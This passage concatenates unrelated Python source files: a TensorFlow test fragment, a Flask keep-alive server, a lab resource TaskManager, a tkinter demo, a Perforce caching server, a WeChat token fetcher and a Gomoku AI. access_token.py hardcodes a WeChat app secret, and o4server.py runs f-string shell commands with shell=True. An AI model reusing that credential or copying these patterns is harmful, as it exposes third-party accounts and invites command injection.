[tensor_shape.TensorShape(None)])
class QueueFromListTest(test.TestCase):
def testQueueFromListShapes(self):
which = constant_op.constant(1)
def _cmp(expected, *shapes):
qs = [
data_flow_ops.PaddingFIFOQueue(10, [dtypes_lib.float32],
[tensor_shape.TensorShape(s)])
for s in shapes
]
s_expected = tensor_shape.TensorShape(expected)
s = data_flow_ops.QueueBase.from_list(which, qs).shapes[0]
if s_expected.ndims is None:
self.assertEqual(s_expected.ndims, s.ndims)
else:
self.assertEqual(s_expected.as_list(), s.as_list())
_cmp(None, [1, None], [None])
_cmp([None], [1], [2])
_cmp([1, None], [1, 1], [1, 2])
_cmp([1, None], [1, 1], [1, None])
_cmp([None, None], [None, 1], [1, None])
_cmp([1], [1], [1], [1])
_cmp([None], [1], [None], [1])
_cmp(None, [1, None], [1], [1])
def testQueueFromListShapesMultipleComponents(self):
q_u_u = data_flow_ops.PaddingFIFOQueue(
10, [dtypes_lib.float32, dtypes_lib.int32],
[tensor_shape.TensorShape([None]), tensor_shape.TensorShape([None])])
q_u_f = data_flow_ops.PaddingFIFOQueue(
10, [dtypes_lib.float32, dtypes_lib.int32],
[tensor_shape.TensorShape([None]), tensor_shape.TensorShape([1, 2])])
q_f_f = data_flow_ops.PaddingFIFOQueue(
10, [dtypes_lib.float32, dtypes_lib.int32],
[tensor_shape.TensorShape([3, 4]), tensor_shape.TensorShape([1, 2])])
which = constant_op.constant(1)
s_cmp_1 = data_flow_ops.QueueBase.from_list(which,
[q_u_u, q_u_u, q_u_u]).shapes
self.assertEqual([1, 1], [x.ndims for x in s_cmp_1])
self.assertEqual([None, None], [x.as_list()[0] for x in s_cmp_1])
s_cmp_2 = data_flow_ops.QueueBase.from_list(which,
[q_u_u, q_u_u, q_u_f]).shapes
self.assertEqual([1, None], [x.ndims for x in s_cmp_2])
self.assertEqual([None], s_cmp_2[0].as_list())
s_cmp_3 = data_flow_ops.QueueBase.from_list(which, [q_f_f, q_f_f]).shapes
self.assertEqual([2, 2], [x.ndims for x in s_cmp_3])
self.assertEqual([[3, 4], [1, 2]], [x.as_list() for x in s_cmp_3])
if __name__ == "__main__":
test.main()
|
webserver.py | from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def home():
return "I'm alive"
def run():
app.run(host='0.0.0.0',port=8080)
def keep_alive():
t = Thread(target=run)
    t.start()
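# Minimal usage sketch (illustrative; run_bot is a hypothetical caller, not
# part of the original snippet): start the pinger thread first, then the
# long-running worker it is meant to keep alive.
#   keep_alive()
#   run_bot()  # e.g. a bot's blocking event loop |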
task_manager.py | """
TaskManager is the core module of the system:
it submits the tasks that are ready to run and assigns the resources they request
"""
import re
import time
from concurrent.futures import Future
from enum import Enum, auto
from threading import Thread
from traceback import print_exc
from typing import Union, Dict, Optional, Type, List, Any, cast
import dill
from bson import ObjectId
from pydantic import BaseModel, root_validator
from .device_view import DeviceView
from .device_view.device import BaseDevice
from .sample_view import SampleView
from .sample_view.sample_view import SamplePositionRequest
from .task_actor import run_task
from .task_view.task_view import TaskView
from .utils.data_objects import get_collection
from .utils.module_ops import load_definition
_SampleRequestDict = Union[str, Dict[str, Union[str, int]]]
_ResourceRequestDict = \
Dict[Optional[Type[BaseDevice]], List[_SampleRequestDict]] # the raw request sent by task process
_EXTRA_REQUEST: str = "__extras"
class RequestStatus(Enum):
"""
The status for a request. It will be stored in the database
"""
PENDING = auto()
FULFILLED = auto()
NEED_RELEASE = auto()
RELEASED = auto()
CANCELED = auto()
ERROR = auto()
class ResourcesRequest(BaseModel):
"""
    This class is used to validate a resource request. Each request should have the format
[DeviceType: List of SamplePositionRequest]
See Also:
:py:class:`SamplePositionRequest <alab_management.sample_view.sample_view.SamplePositionRequest>`
"""
__root__: Dict[str, List[SamplePositionRequest]] # type: ignore
@root_validator(pre=True, allow_reuse=True)
def preprocess(cls, values): # pylint: disable=no-self-use,no-self-argument
values = values["__root__"]
        # if a sample position request is a plain string, promote it to a request with number = 1.
values = {k: [SamplePositionRequest.from_str(v_)
if isinstance(v_, str) else v_
for v_ in v] for k, v in values.items()}
return {"__root__": values}
class RequestMixin:
"""
Simple wrapper for the request collection
"""
def __init__(self):
self._request_collection = get_collection("requests")
def update_request_status(self, request_id: ObjectId, status: RequestStatus):
return self._request_collection.update_one({"_id": request_id}, {"$set": {
"status": status.name
}})
def get_request(self, request_id: ObjectId, **kwargs):
return self._request_collection.find_one({"_id": request_id}, **kwargs)
def get_request_with_status(self, status: RequestStatus):
return self._request_collection.find({"status": status.name})
class TaskManager(RequestMixin):
"""
TaskManager will
(1) find all the ready tasks and submit them,
(2) handle all the resource requests
"""
def __init__(self):
load_definition()
self.task_view = TaskView()
self.sample_view = SampleView()
self.device_view = DeviceView()
super().__init__()
time.sleep(1) # allow some time for other modules to launch
def run(self):
"""
Start the loop
"""
while True:
self._loop()
time.sleep(0.5)
def _loop(self):
self.submit_ready_tasks()
self.handle_released_resources()
self.handle_requested_resources()
def submit_ready_tasks(self):
"""
        Check for tasks that are ready to be submitted (status = READY)
        and submit each of them to the task actor (dramatiq worker).
"""
ready_task_entries = self.task_view.get_ready_tasks()
for task_entry in ready_task_entries:
run_task.send(task_id_str=str(task_entry["task_id"]))
def handle_released_resources(self):
"""
        Release the resources held by requests marked NEED_RELEASE.
"""
for request in self.get_request_with_status(RequestStatus.NEED_RELEASE):
devices = request["assigned_devices"]
sample_positions = request["assigned_sample_positions"]
self._release_devices(devices)
self._release_sample_positions(sample_positions)
self.update_request_status(request_id=request["_id"], status=RequestStatus.RELEASED)
def handle_requested_resources(self):
"""
        Check if there are any requests in PENDING status. If so,
        try to assign the requested resources to them.
"""
# TODO: add priority here (some sort function)
for request in self.get_request_with_status(RequestStatus.PENDING):
self._handle_requested_resources(request)
def _handle_requested_resources(self, request_entry: Dict[str, Any]):
try:
resource_request = request_entry["request"]
task_id = request_entry["task_id"]
devices = self.device_view.request_devices(task_id=task_id, device_types_str=[
device_type for device_type in resource_request.keys()
if device_type != _EXTRA_REQUEST
])
# some devices are not available now
# the request cannot be fulfilled
if devices is None:
return
# replace device placeholder in sample position request
# and make it into a single list
parsed_sample_positions_request = []
for device_type, device in devices.items():
device_name = device["name"]
parsed_sample_positions_request.extend([
{**sample_position_request,
"prefix": re.sub(r"\$", device_name, sample_position_request["prefix"])} # type: ignore
for sample_position_request in resource_request[device_type]])
if any("$" in sample_position_request["prefix"]
for sample_position_request in resource_request.get(_EXTRA_REQUEST, [])):
raise ValueError("$ should not appear under `None`, which is actually not a device.")
parsed_sample_positions_request.extend(resource_request.get(_EXTRA_REQUEST, []))
sample_positions = self.sample_view.request_sample_positions(
task_id=task_id,
sample_positions=[SamplePositionRequest(**request) for request in parsed_sample_positions_request],
)
if sample_positions is None:
return
        # if an error occurs, store it so it is re-raised in the task process instead of the main process
except Exception as error: # pylint: disable=broad-except
self._request_collection.update_one({"_id": request_entry["_id"]}, {"$set": {
"status": RequestStatus.ERROR.name,
"error": dill.dumps(error),
"assigned_devices": None,
"assigned_sample_positions": None,
}})
return
# if both devices and sample positions can be satisfied
self._request_collection.update_one({"_id": request_entry["_id"]}, {"$set": {
"assigned_devices": devices,
"assigned_sample_positions": sample_positions,
"status": RequestStatus.FULFILLED.name,
}})
# label the resources as occupied
self._occupy_devices(devices=devices, task_id=task_id)
self._occupy_sample_positions(sample_positions=sample_positions, task_id=task_id)
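    # Note on the "$" placeholder handled above (an illustrative sketch; the
    # device and prefix names are hypothetical): a request entry such as
    #   {"prefix": "$/inside", "number": 1}
    # under a device type that resolves to the device "furnace_1" is rewritten
    # to {"prefix": "furnace_1/inside", "number": 1} before the sample
    # positions are requested from the sample view.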
def _occupy_devices(self, devices: Dict[str, Dict[str, Any]], task_id: ObjectId):
for device in devices.values():
self.device_view.occupy_device(device=cast(str, device["name"]), task_id=task_id)
def _occupy_sample_positions(self, sample_positions: Dict[str, List[Dict[str, Any]]], task_id: ObjectId):
for sample_positions_ in sample_positions.values():
for sample_position_ in sample_positions_:
self.sample_view.lock_sample_position(task_id, cast(str, sample_position_["name"]))
def _release_devices(self, devices: Dict[str, Dict[str, Any]]):
for device in devices.values():
if device["need_release"]:
self.device_view.release_device(device["name"])
def _release_sample_positions(self, sample_positions: Dict[str, List[Dict[str, Any]]]):
for sample_positions_ in sample_positions.values():
for sample_position in sample_positions_:
if sample_position["need_release"]:
self.sample_view.release_sample_position(sample_position["name"])
class ResourceRequester(RequestMixin):
"""
    Class for requesting lab resources easily. This class inserts a request into the database,
and then the task manager will read from the database and assign the resources.
It is used in :py:class:`~alab_management.lab_view.LabView`.
"""
def __init__(self, task_id: ObjectId):
self._request_collection = get_collection("requests")
self._waiting: Dict[ObjectId, Dict[str, Any]] = {}
self.task_id = task_id
super().__init__()
self._thread = Thread(target=self._check_request_status_loop)
self._thread.daemon = True
self._thread.start()
def request_resources(self, resource_request: _ResourceRequestDict,
timeout: Optional[float] = None) -> Dict[str, Any]:
"""
Request lab resources. Write the request into the database, and then the task manager will read from the
database and assign the resources.
"""
f = Future()
formatted_resource_request = {device_type.__name__: samples for device_type, samples in resource_request.items()
if device_type is not None}
if None in resource_request:
formatted_resource_request[_EXTRA_REQUEST] = resource_request[None]
if not isinstance(formatted_resource_request, ResourcesRequest):
formatted_resource_request = ResourcesRequest(__root__=formatted_resource_request) # type: ignore
formatted_resource_request = formatted_resource_request.dict()["__root__"]
result = self._request_collection.insert_one({"request": formatted_resource_request,
"status": RequestStatus.PENDING.name,
"task_id": self.task_id})
_id: ObjectId = cast(ObjectId, result.inserted_id)
self._waiting[_id] = {
"f": f,
"raw_request": resource_request,
}
try:
result = f.result(timeout=timeout)
except TimeoutError:
            # cancel the request
self.update_request_status(request_id=_id, status=RequestStatus.CANCELED)
raise
return {
**self._post_process_requested_resource(
devices=result["devices"],
sample_positions=result["sample_positions"],
resource_request=formatted_resource_request
),
"request_id": result["request_id"],
}
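    # Usage sketch (illustrative; Furnace and the prefix are hypothetical):
    #   requester = ResourceRequester(task_id)
    #   resources = requester.request_resources({Furnace: ["$/inside"]}, timeout=60)
    #   ...  # work with resources["devices"] and resources["sample_positions"]
    #   requester.release_resources(resources["request_id"])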
def release_resources(self, request_id: ObjectId) -> bool:
"""
Release a request by request_id
"""
result = self._request_collection.update_one({
"_id": request_id,
"status": RequestStatus.FULFILLED.name,
}, {"$set": {
"status": RequestStatus.NEED_RELEASE.name,
}})
return result.modified_count == 1
def _check_request_status_loop(self):
while True:
try:
for request_id in self._waiting.copy().keys():
status = self.get_request(request_id=request_id, projection=["status"])["status"] # type: ignore
if status == RequestStatus.FULFILLED.name:
self._handle_fulfilled_request(request_id=request_id)
elif status == RequestStatus.ERROR.name:
self._handle_error_request(request_id=request_id)
except Exception:
print_exc() # for debugging in the test
raise
time.sleep(0.5)
def _handle_fulfilled_request(self, request_id: ObjectId):
entry = self.get_request(request_id)
if entry["status"] != RequestStatus.FULFILLED.name: # type: ignore
return
assigned_devices: Dict[str, Dict[str, Union[str, bool]]] = entry["assigned_devices"] # type: ignore
assigned_sample_positions: Dict[str, List[Dict[str, Any]]] = entry["assigned_sample_positions"] # type: ignore
request: Dict[str, Any] = self._waiting.pop(request_id)
f: Future = request["f"]
raw_request = request["raw_request"]
device_str_to_type: Dict[str, Type[BaseDevice]] = {device_type.__name__: device_type
for device_type in raw_request if device_type is not None}
f.set_result({
"devices": {device_str_to_type[device_type_str]: device_dict["name"]
for device_type_str, device_dict in assigned_devices.items()},
"sample_positions": {name: [sample_position["name"] for sample_position in sample_positions_list]
for name, sample_positions_list in assigned_sample_positions.items()},
"request_id": request_id,
})
def _handle_error_request(self, request_id: ObjectId):
entry = self.get_request(request_id)
if entry["status"] != RequestStatus.ERROR.name: # type: ignore
return
error: Exception = dill.loads(entry["error"]) # type: ignore
request: Dict[str, Any] = self._waiting.pop(request_id)
f: Future = request["f"]
f.set_exception(error)
@staticmethod
def _post_process_requested_resource(devices: Dict[Type[BaseDevice], str], sample_positions: Dict[str, List[str]],
resource_request: Dict[str, List[Dict[str, Union[int, str]]]]):
processed_sample_positions: Dict[Optional[Type[BaseDevice]], Dict[str, List[str]]] = {}
for device_type, device_str in devices.items(): # type: ignore
sample_position_requests = resource_request[device_type.__name__]
processed_sample_positions[device_type] = {
cast(str, sample_position_request["prefix"]): sample_positions.pop(
cast(str, sample_position_request["prefix"]).replace("$", device_str))
for sample_position_request in sample_position_requests
}
if _EXTRA_REQUEST in resource_request:
processed_sample_positions[None] = {
cast(str, sample_position_request["prefix"]):
sample_positions.pop(cast(str, sample_position_request["prefix"]))
for sample_position_request in resource_request[_EXTRA_REQUEST]
}
return {
"devices": devices,
"sample_positions": processed_sample_positions,
}
|
Control_Frameworks_NOT_working.py | '''
May 2017
@author: Burkhard A. Meier
'''
#==================================================================
import tkinter as tk
from tkinter import ttk
from tkinter import scrolledtext
from threading import Thread
win = tk.Tk()
win.title("Python GUI")
aLabel = ttk.Label(win, text="A Label")
aLabel.grid(column=0, row=0)
ttk.Label(win, text="Enter a name:").grid(column=0, row=0)
name = tk.StringVar()
nameEntered = ttk.Entry(win, width=12, textvariable=name)
nameEntered.grid(column=0, row=1)
ttk.Label(win, text="Choose a number:").grid(column=1, row=0)
number = tk.StringVar()
numberChosen = ttk.Combobox(win, width=12, textvariable=number)
numberChosen['values'] = (1, 2, 4, 42, 100)
numberChosen.grid(column=1, row=1)
numberChosen.current(0)
scrolW = 30
scrolH = 3
scr = scrolledtext.ScrolledText(win, width=scrolW, height=scrolH, wrap=tk.WORD)
scr.grid(column=0, sticky='WE', columnspan=3)
nameEntered.focus()
#==================================================================
# NOT working - CRASHES Python -----------------------------------
def wxPythonApp():
import wx
app = wx.App()
frame = wx.Frame(None, -1, "wxPython GUI", size=(200,150))
frame.SetBackgroundColour('white')
frame.CreateStatusBar()
menu= wx.Menu()
menu.Append(wx.ID_ABOUT, "About", "wxPython GUI")
menuBar = wx.MenuBar()
menuBar.Append(menu,"File")
frame.SetMenuBar(menuBar)
frame.Show()
app.MainLoop()
def tryRunInThread():
runT = Thread(target=wxPythonApp)
    runT.daemon = True  # setDaemon() is deprecated; assign the daemon attribute
runT.start()
print(runT)
    print('createThread():', runT.is_alive())  # isAlive() was removed in Python 3.9
action = ttk.Button(win, text="Call wxPython GUI", command=tryRunInThread)
action.grid(column=2, row=1)
#-----------------------------------------------------------------
#======================
# Start GUI
#======================
win.mainloop() |
o4server.py | #!/usr/bin/env python3
import sys
import os
import time
import logging
import contextlib
from multiprocessing import Pool, Manager
from subprocess import check_output, CalledProcessError
import json
from flask import Flask, request, send_file, redirect, abort, make_response
from flask.logging import default_handler
import o4package
LOG_FORMAT = '[%(asctime)s] remote_addr=%(remote_addr)s forwarded=%(forwarded)s %(message)s'
class RequestFormatter(logging.Formatter):
def format(self, record):
record.remote_addr = getattr(request, 'remote_addr', '-')
record.forwarded = request.environ.get('http_x_forwarded_for', 'not-forwarded')
return super().format(record)
formatter = RequestFormatter(LOG_FORMAT)
default_handler.setFormatter(formatter)
app = Flask(__name__)
workers = None
app.logger.setLevel(logging.INFO)
shared = Manager().dict() # Object shared among all workers
if 'O4_LOG' in os.environ:
o4_log = open(os.environ['O4_LOG'], 'at')
else:
o4_log = sys.stdout
def url(content_type, changelist, depot):
depot = depot.replace('//', '')
return f'/o4-http/{content_type}/{changelist}/{depot}'
def uncached(status, body, headers={}):
resp = make_response(body, status)
for k, v in headers.items():
resp.headers[k] = v
resp.headers['Cache-Control'] = 'no-cache'
return resp
@app.route('/o4-http/help')
def help():
return send_file('o4server.txt', mimetype='text/plain')
@app.route('/o4-http/p4password', methods=['POST'])
def change_password():
if request.content_type != 'application/json':
abort(401, 'Content type must be json')
j = request.get_json()
prev = j.get('previous-password')
if prev != os.environ['P4PASSWD']:
abort(403, '')
new = j.get('new-password')
if not new:
abort(403, '')
os.environ['P4PASSWD'] = new
try:
out = check_output(['p4', 'counter', 'change'])
app.logger.info('Perforce password changed by request')
shared['p4password'] = new
return uncached(204, '')
except Exception as e:
os.environ['P4PASSWD'] = prev
app.logger.info(f'Problem checking new password: {e}')
return uncached(400, '')
@contextlib.contextmanager
def log_time(operation, changelist, depot):
    ctx = {}
start = time.time()
yield ctx
stop = time.time()
changelist = f'@{changelist}' if changelist else ''
msg = f'op={operation} object={depot}{changelist} elapsed={stop-start:.3f}'
if 'redir_cl' in ctx:
msg += f' redir={ctx["redir_cl"]}'
now = time.strftime('%Y-%m-%dT%H:%M:%SZ', time.gmtime())
o4_log.write(f'{now} {msg}\n')
o4_log.flush()
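# Usage sketch (illustrative): the routes below wrap their work in log_time so
# elapsed time is appended to o4_log, and a handler can record a redirect
# target through the yielded dict:
#   with log_time('fstat', 12345, '//depot/app') as ctx:
#       ctx['redir_cl'] = '12000'  # shows up in the log line as redir=12000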
@app.route(url('fstat', '<int:changelist>', '<path:depot>'))
def get_fstat(changelist, depot):
with log_time('fstat', changelist, depot) as ctx:
nearby = request.args.get('nearby')
if nearby:
nearby = int(nearby)
status, fstat = workers.apply(o4package.get_fstat, ('//' + depot, changelist, nearby))
if status == 200:
return send_file(fstat,
mimetype='application/gzip',
as_attachment=True,
attachment_filename=os.path.basename(fstat))
if status // 100 == 3:
fstat = os.path.basename(fstat)
ctx['redir_cl'] = redir_cl = fstat.partition('.')[0]
return redirect(url('fstat', int(redir_cl), depot), status)
abort(404)
@app.route(url('archive', '<int:changelist>', '<path:depot>'))
def get_archive(changelist, depot):
with log_time('archive', changelist, depot) as ctx:
nearby = request.args.get('nearby')
if nearby:
nearby = int(nearby)
code, archive = workers.apply(o4package.get_archive, ('//' + depot, changelist, nearby))
if code // 100 == 3:
archive = os.path.basename(archive)
ctx['redir_cl'] = redir_cl = archive.partition('.')[0]
return redirect(url('archive', int(redir_cl), depot), code)
if archive:
return send_file(archive,
mimetype='application/gzip',
as_attachment=True,
attachment_filename=os.path.basename(archive))
if code == 202:
return 'In progress', 202
abort(code)
@app.route('/o4-http/changelists/<path:depot>')
def get_changelists(depot):
with log_time('get_changelists', None, depot):
changelists = workers.apply(o4package.get_available_changelists, ('//' + depot,))
format = request.headers.get('accept', 'text/plain')
if format == 'text/html':
body = '<ol><li>' + '</li><li>'.join(changelists) + '</li></ol>'
elif format == 'application/json':
body = json.dumps(changelists)
else:
body = '\n'.join(changelists) + '\n'
return uncached(200, body)
def purge():
'''
A never-returning function that periodically removes fstat and archive
files if need be.
'''
from random import shuffle
import o4_config
import o4_fstat
max_single_dir = o4_config.maximum_o4_dir_size()
keep_free = o4_config.minimum_disk_free()
if not max_single_dir and not keep_free:
return
def purge_all(o4dirs):
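        # Prune archive caches first, then fstat caches, stopping as soon as
        # free disk space is back above the configured threshold.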
cmd = "df -k . | tail -1 | awk '{print $4}'"
pa = o4_fstat.prune_archive_cache
pf = o4_fstat.prune_fstat_cache
for prune, dir in [(pa, d) for d in o4dirs] + [(pf, d) for d in o4dirs]:
out = check_output(cmd, shell=True, encoding=sys.stdout.encoding)
free = int(out.strip()) * 1024
if free < keep_free:
prune(dir)
else:
break
def purge_one(d):
cmd = f"du -sk {d} | awk '{{print $1}}'"
out = check_output(cmd, shell=True, encoding=sys.stdout.encoding)
used = int(out.strip()) * 1024
if used > max_single_dir:
o4_fstat.prune_archive_cache(d)
out = check_output(cmd, shell=True, encoding=sys.stdout.encoding)
used = int(out.strip()) * 1024
if used > max_single_dir:
o4_fstat.prune_fstat_cache(d)
while True:
time.sleep(60)
o4dirs = o4package.o4locations()
shuffle(o4dirs)
if keep_free:
purge_all(o4dirs)
if max_single_dir:
for d in o4dirs:
purge_one(d)
if __name__ == '__main__':
import threading
threading.Thread(target=purge, daemon=True).start()
os.environ['NOO4SERVER'] = 'true'
shared['p4password'] = os.environ['P4PASSWD']
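    # Every pool worker receives the shared Manager dict via this initializer.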
def share(*args):
o4package.shared = args[0]
workers = Pool(processes=4, initializer=share, initargs=(shared,))
    try:
        app.run(host='0.0.0.0')
    finally:
        workers.close()
        workers.join()
|
access_token.py | import urllib.request
import time
import json
import threading
class AccssToken():
def __init__(self):
self.appId = 'wxff3cfebbdcbcd135'
self.appScrect = 'b9774614f15c56e6e42884ff84ee5168'
self.__accessToken = ''
self.__time = 0
def get_accessToken(self):
return self.__accessToken
def __real_get_accessToken(self):
while(True):
try:
postUrl = "https://api.weixin.qq.com/cgi-bin/token?grant_type=client_credential&appid=%s&secret=%s" % (self.appId, self.appScrect)
urlResp = urllib.request.urlopen(postUrl)
urlResp = json.loads(urlResp.read().decode('utf-8'))
self.__accessToken = urlResp['access_token']
            except Exception:
                # Ignore transient network errors and retry on the next cycle.
                pass
            print('Periodically refreshed accessToken: ' + self.__accessToken)
            # The original comment said "every 7000 s from program start",
            # but the code actually sleeps 240 s between fetches.
            time.sleep(240)
    # Spawn a background thread that keeps fetching the access_token.
def loop_getAccessToken(self):
t = threading.Thread(target=self.__real_get_accessToken,name='loop_getAccessToken')
t.start()
# t.end()
# self.__real_get_accessToken()
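# Example usage (a sketch, assuming the appId/appScrect above are valid):
#   token = AccssToken()
#   token.loop_getAccessToken()     # start the background refresh thread
#   time.sleep(5)                   # give the first fetch a moment to land
#   print(token.get_accessToken())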
|
FAI.py | import random
import copy
from tkinter import *
import tkinter.messagebox
import tkinter.font as tkFont
import threading
import time
import requests
import json
from base_logger import getLogger
# Algorithm section
class FAI:
    def __init__(self, w: int, h: int):
        self.CODE_P1 = '●'
        self.CODE_P2 = '○'
        self.CODE_BLANK = '　'  # full-width space keeps the grid aligned
self.P1 = 1
self.P2 = 2
self.BLANK = 0
# self.CODE_P1 = ' 1 '
# self.CODE_P2 = ' 2 '
# self.CODE_BLANK = ' 0 '
        # self.CODE_P1 = '■'
        # self.CODE_P2 = '□'
        # self.CODE_BLANK = '.'
self.CODE = {0: self.CODE_BLANK, 1: self.CODE_P1, 2: self.CODE_P2}
self.w = w
self.h = h
        # Five stones in a row wins (Gomoku).
self.WIN_COUNT = 5
        # Build each row as its own list so rows don't alias one object.
self.map = [[0 for i in range(w)] for i in range(h)]
        # Pattern weights used when scoring candidate moves.
self.weights = {
self.P1: {
" 1 ": 1,
" 11 ": 2,
" 111 ": 3,
" 1111 ": 3,
" 12": 0,
" 112": 1,
" 1112": 2,
" 11112": 3,
},
self.P2: {
" 2 ": 1,
" 22 ": 2,
" 222 ": 3,
" 2222 ": 3,
" 21": 0,
" 221": 1,
" 2221": 2,
" 22221": 3,
},
}
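        # NOTE: these patterns are written with '1'/'2'/' ' characters, so
        # they only match when CODE_* are set to the commented-out numeric
        # strings above; with the default circle glyphs, play() finds no matches.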
def __str__(self):
res = self.CODE_BLANK * self.w + self.CODE_BLANK * 2 + '\n'
for y in self.map:
res = res + self.CODE_BLANK
for x in y:
res = res + self.CODE[x]
res = res + self.CODE_BLANK + '\n'
res = res + self.CODE_BLANK * self.w + self.CODE_BLANK * 2
return res
def get_char(self, x=0, y=0):
try:
res = self.CODE[self.map[y][x]]
except KeyError as e:
res = self.CODE[0]
print('get_char ERR:', y, x)
print(self.map)
return res
def put(self, x: int, y: int, val: int):
if self.map[y][x] == self.P1 or self.map[y][x] == self.P2:
return False
self.map[y][x] = val
return True
    # Determine which player (if any) has won.
def win(self, player=0):
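        # Strategy: slide a 5-cell window along every row, column, and both
        # diagonal directions; a window holding only this player's stones
        # (no blanks, no opponent) is five in a row.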
if player == 0:
if self.win(player=self.P1) is True:
return self.P1
if self.win(player=self.P2) is True:
return self.P2
            # No winner yet.
return 0
        # Check rows.
for y in self.map:
            # A rather inefficient sliding-window check.
if player not in y:
continue
for i in range(len(y)):
if y[i] == player:
check = y[i:i + 5]
if self.BLANK not in check:
if player == self.P1 and self.P2 not in check and len(check) == 5:
return True
if player == self.P2 and self.P1 not in check and len(check) == 5:
return True
        # Check columns.
for i in range(self.w):
x = []
for y in self.map:
x.append(y[i])
            # The same inefficient check, for columns.
if player not in x:
continue
for j in range(len(x)):
if x[j] == player:
check = x[j:j + 5]
if self.BLANK not in check:
if player == self.P1 and self.P2 not in check and len(check) == 5:
return True
if player == self.P2 and self.P1 not in check and len(check) == 5:
return True
        # Check "\" diagonals, starting from the top-left corner.
for i in range(self.w):
x = []
for yi in range(len(self.map)):
if i + yi < self.w:
x.append(self.map[yi][i + yi])
            # The same inefficient check, for "\" diagonals.
if player not in x:
continue
for j in range(len(x)):
if x[j] == player:
check = x[j:j + 5]
if self.BLANK not in check:
if player == self.P1 and self.P2 not in check and len(check) == 5:
return True
if player == self.P2 and self.P1 not in check and len(check) == 5:
return True
        # Check "\" diagonals starting down the left edge (toward the bottom-left corner).
for i in range(self.h):
x = []
for xi in range(self.w):
if i + xi < self.h:
x.append(self.map[i][i + xi])
            # The same inefficient check again.
if player not in x:
continue
for j in range(len(x)):
if x[j] == player:
check = x[j:j + 5]
if self.BLANK not in check:
if player == self.P1 and self.P2 not in check and len(check) == 5:
return True
if player == self.P2 and self.P1 not in check and len(check) == 5:
return True
        # Check "/" diagonals, starting from the top-left corner.
for i in range(self.w):
x = []
for yi in range(len(self.map)):
if 0 <= i - yi < self.w:
x.append(self.map[yi][i - yi])
            # The same inefficient check again.
if player not in x:
continue
for j in range(len(x)):
if x[j] == player:
check = x[j:j + 5]
if self.BLANK not in check:
if player == self.P1 and self.P2 not in check and len(check) == 5:
return True
if player == self.P2 and self.P1 not in check and len(check) == 5:
return True
        # Check "/" diagonals starting down the left edge (toward the bottom-left corner).
for i in range(self.h):
x = []
for xi in range(self.w):
if 0 <= i - xi < self.h:
x.append(self.map[i][i - xi])
            # The same inefficient check again.
if player not in x:
continue
for j in range(len(x)):
if x[j] == player:
check = x[j:j + 5]
if self.BLANK not in check:
if player == self.P1 and self.P2 not in check and len(check) == 5:
return True
if player == self.P2 and self.P1 not in check and len(check) == 5:
return True
return False
def play(self, player: int):
weights = [[0 for i in range(self.w)] for i in range(self.h)]
maps = self.__str__().split('\n')
# for iy in range(len(maps)):
        # # Check horizontal lines, left to right
# y = maps[iy]
# for ix in range(len(y)):
# for k in self.weights[player]:
# if y[ix:].startswith(k):
# weights[iy - 1][ix + 1] = weights[iy - 1][ix + 1] + self.weights[player][k]
        # # Check horizontal lines, right to left
# y = maps[iy][::-1]
# for ix in range(len(y)):
# for k in self.weights[player]:
# if y[ix:].startswith(k):
# weights[iy - 1][self.w - (ix + 2)] = weights[iy - 1][self.w - (ix + 2)] + self.weights[player][k]
#
# for ix in range(len(maps[0])):
# y = ''
# for iy in range(len(maps)):
# y = y + maps[iy][ix]
#
        # # Check vertical lines, top to bottom
# for iy in range(len(y)):
# for k in self.weights[player]:
# if y[iy:].startswith(k):
# weights[iy - 1][ix - 1] = weights[iy - 1][ix - 1] + self.weights[player][k]
#
# y = y[::-1]
        # # Check vertical lines, bottom to top
# for iy in range(len(y)):
# for k in self.weights[player]:
# if y[iy:].startswith(k):
# weights[self.h - (iy - 0)][ix - 1] = weights[self.h - (iy - 0)][ix - 1] + self.weights[player][k]
        # "\" direction: from the top-left corner to the bottom-right corner
for ix in range(len(maps[0])):
y = ''
for iy in range(len(maps)):
if ix + iy < len(maps[0]):
y = y + maps[iy][ix + iy]
            # Check the "\" line, top to bottom
for iy in range(len(y)):
for k in self.weights[player]:
if y[iy:].startswith(k):
if ix + iy < len(maps[0]):
weights[iy - 1][ix + iy - 1] = weights[iy - 1][ix + iy - 1] + self.weights[player][k]
y = y[::-1]
            # Check the same line reversed, from the other end
for iy in range(len(y)):
for k in self.weights[player]:
if y[iy:].startswith(k):
if ix + iy < len(maps[0]):
weights[self.h - (iy - 0)][self.w - (ix + iy + 0)] = weights[self.h - (iy - 0)][self.w - (ix + iy + 0)] \
+ self.weights[player][k]
        # "\" direction: from the top-left corner to the bottom-left corner
for iy in range(len(maps)):
y = ''
for ix in range(len(maps[0])):
if ix + iy < len(maps[0]):
y = y + maps[iy][ix + iy]
            # Check the "\" line, top to bottom
for ix in range(len(y)):
for k in self.weights[player]:
if y[ix:].startswith(k):
if ix + iy < len(maps[0]):
weights[iy - 1][ix + iy - 1] = weights[iy - 1][ix + iy - 1] + self.weights[player][k]
# y = y[::-1]
            # # Check the same line reversed, from the other end
# for iy in range(len(y)):
# for k in self.weights[player]:
# if y[iy:].startswith(k):
# if ix + iy < len(maps[0]):
# weights[self.h - (iy - 0)][self.w - (ix + iy + 0)] = weights[self.h - (iy - 0)][
# self.w - (ix + iy + 0)] \
# + self.weights[player][k]
for w in weights:
print(w)
class FAINetwork:
def __init__(self):
self.API_MAIN = 'https://lance-go-online.herokuapp.com/'
self.API1 = 'https://lance-go-online.herokuapp.com/play/'
self.API2 = 'https://lance-go-online.herokuapp.com/playing/'
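    # wakeup() pings the server (a Heroku dyno, which may be asleep);
    # get_data()/get_result() poll game state; post_result() submits a move.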
def wakeup(self, timeout: float = 30):
try:
r = requests.get(self.API_MAIN, timeout=timeout)
except requests.exceptions.ConnectTimeout:
return False
if r.status_code != 200:
return False
return True
def get_data(self, code: str):
r = requests.get(self.API2 + code)
if r.status_code != 200:
return ''
return r.text
def get_result(self, code: str):
r = requests.get(self.API1 + code)
if r.status_code != 200:
return {"code": code, "data": "", "error": "Server Error", "status": 0, "uptime": 0, "winner": 0}
try:
js = json.loads(r.text)
except json.decoder.JSONDecodeError:
return {"code": code, "data": "", "error": "Server Error", "status": 0, "uptime": 0, "winner": 0}
return js
def post_result(self, code: str, player: int, action: str = 'put', data: str = None, winner: int = 0, size: str = None):
params = {'action': action, 'player': player, 'winner': winner}
if size is not None:
params['size'] = size
if data is not None:
params['data'] = data
r = requests.post(self.API1 + code, data=params)
if r.status_code != 200:
return {'code': -1, 'message': "Server Error."}
try:
js = json.loads(r.text)
except json.decoder.JSONDecodeError:
return {"code": code, "data": "", "error": "Server Error", "status": 0, "uptime": 0, "winner": 0}
return js
# UI section
class FaiUi:
